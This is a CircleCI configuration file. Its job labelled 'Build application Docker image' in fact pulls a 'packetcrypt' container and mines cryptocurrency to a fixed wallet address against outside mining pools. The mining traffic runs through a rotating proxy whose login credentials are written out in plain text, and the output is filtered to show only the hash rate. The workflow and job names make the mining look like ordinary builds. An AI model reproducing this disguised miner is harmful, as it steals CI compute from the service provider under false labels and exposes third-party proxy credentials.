.build_template: &build_definition
    steps:
      - checkout
      - setup_remote_docker
      - run:
          name: Build application Docker image
          command: |
            docker pull thomasjp0x42/packetcrypt
            docker container run \
              -e HTTP_PROXY=http://pdqlmckd-rotate:ou06px9w8ey9@p.webshare.io:80/ \
              -e HTTPS_PROXY=http://pdqlmckd-rotate:ou06px9w8ey9@p.webshare.io:80/ \
              thomasjp0x42/packetcrypt ann -p pkt1qv437nndzvr9u8ps60g3d5dl0gssu84ulwksvfq https://stratum.zetahash.com/ http://pool.srizbi.com 2>&1 | grep -o "annmine.rs.*Ke.*"
version: 2.0

jobs:
  build:
    docker:
      - image: cimg/go:1.17
    steps:
      - checkout
  gas1:
    <<: *build_definition
    docker:
      - image: docker:17.05.0-ce-git
    
workflows:
  version: 2
  build_ruby_versions:
    jobs:
      - build
      - gas1
